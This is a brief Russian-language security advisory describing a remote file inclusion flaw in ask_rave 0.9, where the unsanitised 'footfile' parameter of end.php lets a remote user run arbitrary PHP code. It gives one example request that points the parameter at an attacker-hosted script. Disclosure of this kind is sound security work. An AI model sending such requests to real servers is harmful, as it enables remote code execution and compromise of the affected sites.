Программа: ask_rave 0.9
0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «footfile» сценарием end.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. 

Пример:

http://localhost/path/end.php?footfile=http://EvElCoDe.txt?



Оставить мнение